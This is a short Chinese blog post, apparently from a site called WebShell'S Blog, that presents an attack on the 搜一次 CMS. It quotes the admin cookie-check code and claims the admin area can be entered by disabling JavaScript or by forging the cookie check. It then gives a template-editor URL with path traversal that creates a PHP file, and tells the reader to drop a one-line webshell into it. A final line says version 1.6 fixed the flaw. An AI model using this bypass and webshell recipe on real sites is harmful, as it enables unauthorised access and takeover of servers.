搜一次 cms php 通杀
洞文件 admin 目录下的 admin_loginstate.php
看代码
if(empty($_COOKIE['S_AdminID'])){
echo "<script>window.location='admin_login.php'</script>";
exit;
}
elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){
echo "<script>window.parent.location='admin_login.php'</script>";
exit;
}
?>
很简单的看出来是 cookie验证 我们直接禁止JS可直接进后台
进后台后简单的说下拿shell的方法
/admin/admin_template.php?action=templist&path=../skins/index/html/&tempname=默认模版&file=qingshen.php
直接访问这个url 然后写个一句话就可以了 目录当然是在 /skins/index/html/ 目录下的
话说小弟刚来 管理不给加点银子么
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3312.html
这个洞1.6就 补上了